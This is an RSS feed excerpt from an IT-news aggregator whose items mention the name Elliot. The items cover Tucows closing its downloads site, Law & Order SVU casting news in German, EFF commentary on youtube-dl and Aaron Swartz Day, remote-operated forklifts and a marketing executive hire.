We're pleased to say that much of the software and other assets that made up the Tucows Downloads library have been transferred to our friends at the Internet Archive for posterity. 

The shareware downloads bulletin board system (BBS) that would become Tucows Downloads was founded back in 1993 on a library computer in Flint, MI. What started as a place for people in the know to download software became the place to download software on the burgeoning Internet. Far more quickly than anyone could have imagined. 

A lot has changed since those early years. Tucows has grown and evolved as a business. It's been a long time since Tucows has been TUCOWS, which stood for The Ultimate Collection of Winsock Software. 

Today, Tucows is the second-largest domain name registrar in the world behind Go Daddy and the largest wholesaler of domain names in the world with customers like Shopify and other global website builder platforms. Hover offers domain names and email at retail to help people brand their life online. OpenSRS (and along the way our acquisitions of Enom, Ascio and EPAG) are the SaaS platforms upon which tens of thousands of customers have built their own domain registration businesses, registering tens of millions of domains on behalf of their customers. Ting Internet is building fiber-optic networks all over the U.S. At the same time, we're building the Mobile Services Enabler SaaS platform that is powering DISH's entry into the US mobile market. 

Point is, we're keeping busy. 

For the past several years, history, well sentimentality, has been the only reason to keep Tucows Downloads around. We talked about shutting the site down before. Most seriously in 2016 when instead, we decided to go ad-free, keeping the site up as a public service. 

Today is different. Tucows Downloads is old. Old sites are a maintenance challenge and therefore a risk. Maintaining the Tucows Downloads site pulls people away from the work that moves our businesses forward. 

Tucows Downloads has had an incredible run. Retiring it is the right move but that doesn't alter the fact that it will always hold a special place in hearts and our story. We're thankful to the thousands of software developers who used Tucows Downloads to get their software in front of millions of people, driving billions of downloads over more than 25 years. 

Thank you.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=After+28+Years%2C+Tucows+Finally+Closes+Its+Downloads+Site%3A+https%3A%2F%2Fbit.ly%2F3c6prwr"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F21%2F01%2F25%2F0155204%2Fafter-28-years-tucows-finally-closes-its-downloads-site%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/21/01/25/0155204/after-28-years-tucows-finally-closes-its-downloads-site?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Law &amp; Order - SVU: Darauf haben Fans gewartet, Benson und Stabler wieder vereint!]]></title>
<description><![CDATA[9 lange Jahre mussten "Law & Order: SVU"-Fans ohne Elliot Stabler auskommen. Doch nun ist er zurück, wie neue Set-Bilder beweisen. Seht sie auf Netzwelt.
																					Dieser Artikel wurde einsortiert unter 
																	Entertainment,																	NBC,																	Serien,						...]]></description>
<link>https://tsecurity.de/de/1354393/it-nachrichten/law-amp-order-svu-darauf-haben-fans-gewartet-benson-und-stabler-wieder-vereint/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1354393/it-nachrichten/law-amp-order-svu-darauf-haben-fans-gewartet-benson-und-stabler-wieder-vereint/</guid>
<pubDate>Mon, 18 Jan 2021 17:33:06 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[9 lange Jahre mussten "Law &amp; Order: SVU"-Fans ohne Elliot Stabler auskommen. Doch nun ist er zurück, wie neue Set-Bilder beweisen. Seht sie auf Netzwelt.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/tv-sender/nbc.html">NBC</a>,																	<a href="https://www.netzwelt.de/serien/index.html">Serien</a>,																	<a href="https://www.netzwelt.de/serien/law--order-special-victims-unit/index.html">Law &amp; Order - Special Victims Unit: Staffeln und Episodenguide</a>,																	<a href="https://www.netzwelt.de/serien/law--order-organized-crime/index.html">Law &amp; Order - Organized Crime Produktion kann starten - neue Showrunnerin ist gefunden</a>.<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/netzwelt?a=FNy5iuusqN4:WT1eCEVfQ_g:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/netzwelt?d=qj6IDK7rITs" border="0"></a>
</div><img src="http://feeds.feedburner.com/~r/netzwelt/~4/FNy5iuusqN4" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[Law &amp; Order: SVU - Christopher Meloni teilt 1. Bild von Elliot Stablers Rückkehr]]></title>
<description><![CDATA[Elliot Stabler ist zurück! Fans konnten es kaum erwarten, und "Law & Order: SVU"-Star Christopher Meloni schafft jetzt per Social-Media-Post letzte Klarheit. Mehr dazu auf Netzwelt.
																					Dieser Artikel wurde einsortiert unter 
																	TV-Serie / Webserie,																	...]]></description>
<link>https://tsecurity.de/de/1322691/it-nachrichten/law-amp-order-svu-christopher-meloni-teilt-1-bild-von-elliot-stablers-rueckkehr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1322691/it-nachrichten/law-amp-order-svu-christopher-meloni-teilt-1-bild-von-elliot-stablers-rueckkehr/</guid>
<pubDate>Wed, 09 Dec 2020 21:32:21 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Elliot Stabler ist zurück! Fans konnten es kaum erwarten, und "Law &amp; Order: SVU"-Star Christopher Meloni schafft jetzt per Social-Media-Post letzte Klarheit. Mehr dazu auf Netzwelt.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/serien/index.html">TV-Serie / Webserie</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/tv-sender/nbc.html">NBC</a>,																	<a href="https://www.netzwelt.de/serien/index.html">Serien</a>,																	<a href="https://www.netzwelt.de/serien/law--order-special-victims-unit/index.html">Law &amp; Order - Special Victims Unit: Staffeln und Episodenguide</a>,																	<a href="https://www.netzwelt.de/serien/law--order-organized-crime/index.html">Law &amp; Order - Organized Crime: Alle Infos zur Rückkehr von Fan-Liebling Elliot Stabler</a>.<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/netzwelt?a=jWlMlENQj44:b6Apvv1VwxU:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/netzwelt?d=qj6IDK7rITs" border="0"></a>
</div><img src="http://feeds.feedburner.com/~r/netzwelt/~4/jWlMlENQj44" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[Law &amp; Order: SVU: Christopher Meloni ist zurück + Prison Break-Star in Staffel 22]]></title>
<description><![CDATA[Die Heimkehr von Fanfavorit Christopher Meloni zu "Law & Order: SVU" steht kurz bevor, und auch "Prison Break"-Star Wentworth Miller ist in Staffel 22 erneut mit von der Partie.
																					Dieser Artikel wurde einsortiert unter 
																	TV-Serie / Webserie,																	Ente...]]></description>
<link>https://tsecurity.de/de/1318013/it-nachrichten/law-amp-order-svu-christopher-meloni-ist-zurueck-prison-break-star-in-staffel-22/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1318013/it-nachrichten/law-amp-order-svu-christopher-meloni-ist-zurueck-prison-break-star-in-staffel-22/</guid>
<pubDate>Fri, 04 Dec 2020 19:02:26 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Heimkehr von Fanfavorit Christopher Meloni zu "Law &amp; Order: SVU" steht kurz bevor, und auch "Prison Break"-Star Wentworth Miller ist in Staffel 22 erneut mit von der Partie.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/serien/index.html">TV-Serie / Webserie</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/tv-sender/nbc.html">NBC</a>,																	<a href="https://www.netzwelt.de/serien/index.html">Serien</a>,																	<a href="https://www.netzwelt.de/serien/law--order-special-victims-unit/index.html">Law &amp; Order - Special Victims Unit: Staffeln und Episodenguide</a>,																	<a href="https://www.netzwelt.de/serien/law--order-organized-crime/index.html">Law &amp; Order - Organized Crime: Alle Infos zur Rückkehr von Fan-Liebling Elliot Stabler</a>.<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/netzwelt?a=rM29QHwm_yU:k_-Eh-HwWiw:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/netzwelt?d=qj6IDK7rITs" border="0"></a>
</div><img src="http://feeds.feedburner.com/~r/netzwelt/~4/rM29QHwm_yU" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[Hardware-Hack: YouTuber spielt PS5-Games auf dem Game Boy]]></title>
<description><![CDATA[Schon seit Jahren machen sich Hobby-Bastler einen Spaß daraus, Spiele und weitere Anwendungen auf alter Hardware zum Laufen zu bringen. Der YouTuber Elliot von The Retro Future hat es jetzt geschafft, PS5-Titel auf unterschiedlichen alten Game Boy-Konsolen anzuzeigen.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/1305652/it-security-nachrichten/hardware-hack-youtuber-spielt-ps5-games-auf-dem-game-boy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1305652/it-security-nachrichten/hardware-hack-youtuber-spielt-ps5-games-auf-dem-game-boy/</guid>
<pubDate>Mon, 23 Nov 2020 18:31:38 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,119640.html"><img hspace="5" border="0" align="left" alt="Gaming, Spiele, Konsole, Sony, Spielkonsole, Games, Konsolen, Spielekonsole, Spielekonsolen, PlayStation 5, ps5, Sony PlayStation 5, Blu-ray, digital edition, PS5 Digital Edition" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/40627.jpg"></a>
			Schon seit Jahren machen sich Hobby-Bastler einen Spaß daraus, Spiele und weitere Anwendungen auf alter Hardware zum Laufen zu bringen. Der <a href="https://winfuture.de/special/youtube/" title="YouTube Special">YouTuber</a> Elliot von The Retro Future hat es jetzt geschafft, PS5-Titel auf unterschiedlichen alten Game Boy-Konsolen anzuzeigen.			(<a href="https://winfuture.de/news,119640.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[Hardware-Hack: YouTuber spielt PS5-Games auf dem Game Boy]]></title>
<description><![CDATA[Schon seit Jahren machen sich Hobby-Bastler einen Spaß daraus, Spiele und weitere Anwendungen auf alter Hardware zum Laufen zu bringen. Der YouTuber Elliot von The Retro Future hat es jetzt geschafft, PS5-Titel auf unterschiedlichen alten Game Boy-Konsolen anzuzeigen.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/1305653/it-security-nachrichten/hardware-hack-youtuber-spielt-ps5-games-auf-dem-game-boy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1305653/it-security-nachrichten/hardware-hack-youtuber-spielt-ps5-games-auf-dem-game-boy/</guid>
<pubDate>Mon, 23 Nov 2020 18:31:38 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,119640.html"><img hspace="5" border="0" align="left" alt="Gaming, Spiele, Konsole, Sony, Spielkonsole, Games, Konsolen, Spielekonsole, Spielekonsolen, PlayStation 5, ps5, Sony PlayStation 5, Blu-ray, digital edition, PS5 Digital Edition" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/40627.jpg"></a>
			Schon seit Jahren machen sich Hobby-Bastler einen Spaß daraus, Spiele und weitere Anwendungen auf alter Hardware zum Laufen zu bringen. Der <a href="https://winfuture.de/special/youtube/" title="YouTube Special">YouTuber</a> Elliot von The Retro Future hat es jetzt geschafft, PS5-Titel auf unterschiedlichen alten Game Boy-Konsolen anzuzeigen.			(<a href="https://winfuture.de/news,119640.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[Aaron Swartz's Memory Honored with Virtual Hackathon]]></title>
<description><![CDATA[Saturday saw 2020's virtual observation of the annual Aaron Swartz Day and International Hackathon, which the EFF describes as "a day dedicated to celebrating the continuing legacy of activist, programmer, and entrepreneur Aaron Swartz." 

Its official web site notes the wide-ranging event includ...]]></description>
<link>https://tsecurity.de/de/1297670/it-security-nachrichten/aaron-swartzs-memory-honored-with-virtual-hackathon/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1297670/it-security-nachrichten/aaron-swartzs-memory-honored-with-virtual-hackathon/</guid>
<pubDate>Sun, 15 Nov 2020 20:17:03 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Saturday saw 2020's virtual observation of the annual Aaron Swartz Day and International Hackathon, which the EFF describes as "a day dedicated to celebrating the continuing legacy of activist, programmer, and entrepreneur Aaron Swartz." 

Its official web site notes the wide-ranging event includes "projects and ideas that are still bearing fruit to this day, such as SecureDrop, Open Library, and the Aaron Swartz Day Police Surveillance Project." The event even included a virtual session for the Atlas of Surveillance project which involved documenting instances of law enforcement using surveillance technologies like social media monitoring, automated license plate readers, and body-worn cameras. And EFF special advisor Cory Doctorow, director of strategy Danny O'Brien, and senior activist Elliot Harmon also spoke "about Aaron's legacy and how his work lives on today," according to the EFF's announcement:

Aaron Swartz was a brilliant champion of digital rights, dedicated to ensuring the Internet remained a thriving ecosystem for open knowledge. EFF was proud to call him a close friend and collaborator. His life was cut short in 2013, after he was charged under the notoriously draconian Computer Fraud and Abuse Act for systematically downloading academic journal articles from the online database JSTOR. 

Federal prosecutors stretch this law beyond its original purpose of stopping malicious computer break-ins, reserving the right to push for heavy penalties for any behavior they don't like that happens to involve a computer. This was the case for Aaron, who was charged with eleven counts under the CFAA. Facing decades in prison, Aaron died by suicide at the age of 26. He would have turned 34 this year, on November 8. 

In addition to EFF projects, the hackathon will focus on projects including SecureDrop, Open Library, and the Aaron Swartz Day Police Surveillance Project. The full lineup of speakers includes Aaron Swartz Day co-founder Lisa Rein, SecureDrop lead Mickael E., researcher Mia Celine, Lucy Parsons Lab founder Freddy Martinez, and Brewster Kahle — co-founder of Aaron Swartz Day and the Internet Archive. 

All of the presentations are now online.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Aaron+Swartz's+Memory+Honored+with+Virtual+Hackathon%3A+https%3A%2F%2Fbit.ly%2F32LcKBZ"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F20%2F11%2F15%2F1738254%2Faaron-swartzs-memory-honored-with-virtual-hackathon%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/20/11/15/1738254/aaron-swartzs-memory-honored-with-virtual-hackathon?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[EFF Argues RIAA is 'Abusing DMCA' to Take Down YouTube-DL]]></title>
<description><![CDATA[While the RIAA has objected to a tool for downloading online videos, EFF senior activist Elliot Harmon responds with this question. "Who died and put them in charge of YouTube?" 

He asks the question in a new video "explainer" on the controversy, and argues in a new piece at EFF.org that the you...]]></description>
<link>https://tsecurity.de/de/1289825/it-security-nachrichten/eff-argues-riaa-is-abusing-dmca-to-take-down-youtube-dl/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1289825/it-security-nachrichten/eff-argues-riaa-is-abusing-dmca-to-take-down-youtube-dl/</guid>
<pubDate>Sat, 07 Nov 2020 23:16:49 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[While the RIAA has objected to a tool for downloading online videos, EFF senior activist Elliot Harmon responds with this question. "Who died and put them in charge of YouTube?" 

He asks the question in a new video "explainer" on the controversy, and argues in a new piece at EFF.org that the youtube-dl tool "doesn't infringe on any RIAA copyrights."

RIAA's argument relies on a different section of the DMCA, Section 1201. DMCA 1201 says that it's illegal to bypass a digital lock in order to access or modify a copyrighted work. Copyright holders have argued that it's a violation of DMCA 1201 to bypass DRM even if you're doing it for completely lawful purposes; for example, if you're downloading a video on YouTube for the purpose of using it in a way that's protected by fair use. (And thanks to the way that copyright law has been globalized via trade agreements, similar laws exist in many other jurisdictions too.) RIAA argues that since youtube-dl could be used to download music owned by RIAA-member labels, no one should be able to use the tool, even for completely lawful purposes. 

This is an egregious abuse of the notice-and-takedown system, which is intended to resolve disputes over allegedly infringing material online. Again, youtube-dl doesn't use RIAA-member labels' music in any way. The makers of youtube-dl simply shared information with the public about how to perform a certain task — one with many completely lawful applications. 
Harmon wants to hear from people using youtube-dl for lawful purposes. And he also links to an earlier EFF piece arguing that DMCA 1201 "is incredibly broad, apparently allowing rightsholders to legally harass any 'trafficker' in code that lets users re-take control of their devices from DRM locks..." 
And EFF's concern over DMCA 1201 has been ongoing:
DMCA 1201 has been loaded with terrible implications for innovation and free expression since the day it was passed. For many years, EFF documented these issues in our "Unintended Consequences" series; we continue to organize and lobby for temporary exemptions to its provisions for the purposes of cellphone unlocking, restoring vintage videogames and similar fair uses, as well as file and defend lawsuits in the United States to try and mitigate its damage. We look forward to the day when it is no longer part of U.S. law. 
But due to the WIPO Copyright Treaty, the DMCA's anti-circumvention provisions infest much of the world's jurisdictions too, including the European Union via the Information Society Directive 2001/29/EC.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=EFF+Argues+RIAA+is+'Abusing+DMCA'+to+Take+Down+YouTube-DL%3A+https%3A%2F%2Fbit.ly%2F3p9bQJ5"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F20%2F11%2F07%2F0313228%2Feff-argues-riaa-is-abusing-dmca-to-take-down-youtube-dl%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/20/11/07/0313228/eff-argues-riaa-is-abusing-dmca-to-take-down-youtube-dl?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Forklift Truck Drivers Who Never Leave Their Desks]]></title>
<description><![CDATA[Forklift operators are using remote-control technology that allows them to work off-site, controlling their machines from afar. The BBC reports: [A]s Covid-19 spreads easily, the warehouses dotted along the world's supply chains have become potential hubs of disease transmission, says Elliot Katz...]]></description>
<link>https://tsecurity.de/de/1273261/it-security-nachrichten/the-forklift-truck-drivers-who-never-leave-their-desks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1273261/it-security-nachrichten/the-forklift-truck-drivers-who-never-leave-their-desks/</guid>
<pubDate>Thu, 22 Oct 2020 13:01:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Forklift operators are using remote-control technology that allows them to work off-site, controlling their machines from afar. The BBC reports: [A]s Covid-19 spreads easily, the warehouses dotted along the world's supply chains have become potential hubs of disease transmission, says Elliot Katz, co-founder of Phantom Auto. Phantom Auto's technology is now installed in around a dozen warehouses in the US and Europe, he adds. Some of the warehouses using Phantom Auto's technology fence-off the space where the remote-controlled forklifts work, says Mr Katz and the forklifts are also fitted with microphones so the operator can be warned should something be about to go wrong. "If someone is behind that forklift and says, 'Hey, you're about to hit me,' the operator can hear it just like he's sitting on the forklift," says Mr Katz.
 
Among the other firms working in the teleoperation space is US start-up Teleo. It specializes in retrofitting construction equipment so it can be driven remotely. It has just started a trial at a quarry for an unnamed client. In this case, Teleo has adapted a large-wheeled loading vehicle so it can be controlled from an office on site. In the future, a driver could sit in the office and remotely control a variety of vehicles nearby. That might mean fewer people would be employed on-site overall but Teleo argues it makes the role safer for the driver.
 
But the idea of vehicles driven like this is controversial for some. There's always the possibility a terrorist, for example, might try to hack such a system and use a teleoperated car or truck to kill people. Mr Katz and Mr Shet [Teleo co-founder and chief executive] both say their firms have thought about this scenario and add that their engineers have introduced various steps to make a cyber-attack harder. For example, by encrypting communications between teleoperator and vehicle, requiring authorization of drivers and automatically shutting down vehicles should they lose access to a reliable communications signal. No-one can guarantee that such a system will never be hacked, though.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=The+Forklift+Truck+Drivers+Who+Never+Leave+Their+Desks%3A+https%3A%2F%2Fbit.ly%2F3m815nV"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F20%2F10%2F21%2F2258255%2Fthe-forklift-truck-drivers-who-never-leave-their-desks%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/20/10/21/2258255/the-forklift-truck-drivers-who-never-leave-their-desks?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Law &amp; Order SVU Staffel 22 zunächst ohne Fan-Liebling Christopher Meloni!]]></title>
<description><![CDATA[Christopher Meloni verkörperte in "Law & Order SVU" über Jahre Elliot Stabler, doch seine geplante Rückkehr wurde nun leider verschoben. Netzwelt weiß mehr.
																					Dieser Artikel wurde einsortiert unter 
																	RTL,																	TV-Serie / Webserie,																	Ente...]]></description>
<link>https://tsecurity.de/de/1224001/it-nachrichten/law-amp-order-svu-staffel-22-zunaechst-ohne-fan-liebling-christopher-meloni/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1224001/it-nachrichten/law-amp-order-svu-staffel-22-zunaechst-ohne-fan-liebling-christopher-meloni/</guid>
<pubDate>Mon, 31 Aug 2020 21:17:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Christopher Meloni verkörperte in "Law &amp; Order SVU" über Jahre Elliot Stabler, doch seine geplante Rückkehr wurde nun leider verschoben. Netzwelt weiß mehr.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/tv-sender/rtl.html">RTL</a>,																	<a href="https://www.netzwelt.de/serien/index.html">TV-Serie / Webserie</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/tv-sender/nbc.html">NBC</a>,																	<a href="https://www.netzwelt.de/serien/index.html">Serien</a>,																	<a href="https://www.netzwelt.de/serien/law--order-special-victims-unit/index.html">Law &amp; Order - Special Victims Unit: Staffeln und Episodenguide</a>.<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/netzwelt?a=jogd2q6kxtA:DGohDAi5W28:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/netzwelt?d=qj6IDK7rITs" border="0"></a>
</div><img src="http://feeds.feedburner.com/~r/netzwelt/~4/jogd2q6kxtA" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Maps: Riesige Libelle vor Seattle gesichtet]]></title>
<description><![CDATA[Was schwimmt denn da im Wasser? Auf Luftbildern von Google Maps haben Reddit-Nutzer nun vor der Elliot Bay Marina in Seattle scheinbar eine riesige Libelle gesichtet. 
																					Dieser Artikel wurde einsortiert unter 
																	Download,																	Google,																	G...]]></description>
<link>https://tsecurity.de/de/1180570/it-nachrichten/google-maps-riesige-libelle-vor-seattle-gesichtet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1180570/it-nachrichten/google-maps-riesige-libelle-vor-seattle-gesichtet/</guid>
<pubDate>Thu, 16 Jul 2020 06:32:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Was schwimmt denn da im Wasser? Auf Luftbildern von Google Maps haben Reddit-Nutzer nun vor der Elliot Bay Marina in Seattle scheinbar eine riesige Libelle gesichtet. 
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/download/index.html">Download</a>,																	<a href="https://www.netzwelt.de/hersteller/google.html">Google</a>,																	<a href="https://www.netzwelt.de/software/google-maps.html">Google Maps</a>,																	<a href="https://www.netzwelt.de/download/freizeit/routenplaner/index.html">Routenplaner &amp; Kartendienste</a>,																	<a href="https://www.netzwelt.de/download/freizeit/index.html">Heim &amp; Hobby</a>.<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/netzwelt?a=UIZ7Je6n4uc:6xWfG1FuSu4:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/netzwelt?d=qj6IDK7rITs" border="0"></a>
</div><img src="http://feeds.feedburner.com/~r/netzwelt/~4/UIZ7Je6n4uc" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[Law &amp; Order - Organized Crime: Christopher Meloni kündigt Wiedersehen zwischen Benson und Stabler an]]></title>
<description><![CDATA[Mit "Law & Order: Organized Crime" kehrt Christopher Meloni und somit auch seine Figur Elliot Stabler ins "Law & Order"-Universum zurück. Das bedeutet für Fans, dass sich Stabler und Olivia Benson nach Jahren endlich wiedersehen werden.
																					Dieser Artikel wurde einsortiert unter ...]]></description>
<link>https://tsecurity.de/de/1172775/it-nachrichten/law-amp-order-organized-crime-christopher-meloni-kuendigt-wiedersehen-zwischen-benson-und-stabler-an/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1172775/it-nachrichten/law-amp-order-organized-crime-christopher-meloni-kuendigt-wiedersehen-zwischen-benson-und-stabler-an/</guid>
<pubDate>Wed, 08 Jul 2020 15:02:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mit "Law &amp; Order: Organized Crime" kehrt Christopher Meloni und somit auch seine Figur Elliot Stabler ins "Law &amp; Order"-Universum zurück. Das bedeutet für Fans, dass sich Stabler und Olivia Benson nach Jahren endlich wiedersehen werden.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/serien/index.html">TV-Serie / Webserie</a>,																	<a href="https://www.netzwelt.de/tv-sender/vox.html">VOX</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/tv-sender/nbc.html">NBC</a>,																	<a href="https://www.netzwelt.de/serien/index.html">Serien</a>,																	<a href="https://www.netzwelt.de/serien/law--order-special-victims-unit/index.html">Law &amp; Order - Special Victims Unit: Staffeln und Episodenguide</a>,																	<a href="https://www.netzwelt.de/serien/law--order-organized-crime/index.html">"Law &amp; Order: Organized Crime": Alle Infos zur Rückkehr von Fan-Liebling Elliot Stabler</a>.<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/netzwelt?a=otNm281DLP8:mIkusUo4pdQ:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/netzwelt?d=qj6IDK7rITs" border="0"></a>
</div><img src="http://feeds.feedburner.com/~r/netzwelt/~4/otNm281DLP8" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[Erfolgsserie "Law & Order": Spin-off bringt Serien-Star zurück]]></title>
<description><![CDATA[Die Welt von "Law & Order" wird noch einmal ein Stück größer: Im Herbst startet das Spin-off "Law & Order: Organized Crime", in dem Christopher Meloni erneut in seiner Paraderolle als Elliot Stabler zu sehen ist.]]></description>
<link>https://tsecurity.de/de/1156432/it-nachrichten/erfolgsserie-law-order-spin-off-bringt-serien-star-zurueck/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1156432/it-nachrichten/erfolgsserie-law-order-spin-off-bringt-serien-star-zurueck/</guid>
<pubDate>Mon, 22 Jun 2020 16:32:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img align="right" alt="" width="60" height="60" src="https://www.chip.de/ii/1/2/6/2/9/4/8/3/3/c085d53a1442ac21.png"> Die Welt von "Law &amp; Order" wird noch einmal ein Stück größer: Im Herbst startet das Spin-off "Law &amp; Order: Organized Crime", in dem Christopher Meloni erneut in seiner Paraderolle als Elliot Stabler zu sehen ist.]]></content:encoded>
</item>
<item>
<title><![CDATA[Mark Elliot joins BioCatch as Chief Marketing Officer]]></title>
<description><![CDATA[BioCatch announced that Mark Elliot has joined the senior leadership team as Chief Marketing Officer. In this role, Mark will lead all marketing efforts and grow the brand globally as BioCatch looks to broaden its product offerings and further support its expanding client base into new verticals ...]]></description>
<link>https://tsecurity.de/de/1150673/it-security-nachrichten/mark-elliot-joins-biocatch-as-chief-marketing-officer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1150673/it-security-nachrichten/mark-elliot-joins-biocatch-as-chief-marketing-officer/</guid>
<pubDate>Wed, 17 Jun 2020 00:46:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>BioCatch announced that Mark Elliot has joined the senior leadership team as Chief Marketing Officer. In this role, Mark will lead all marketing efforts and grow the brand globally as BioCatch looks to broaden its product offerings and further support its expanding client base into new verticals following a $145 million Series C investment led by Bain Capital Tech Opportunities, the growth investing business of Bain Capital. Mark comes to BioCatch after more than a … <a href="https://www.helpnetsecurity.com/2020/06/17/biocatch-mark-elliot/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
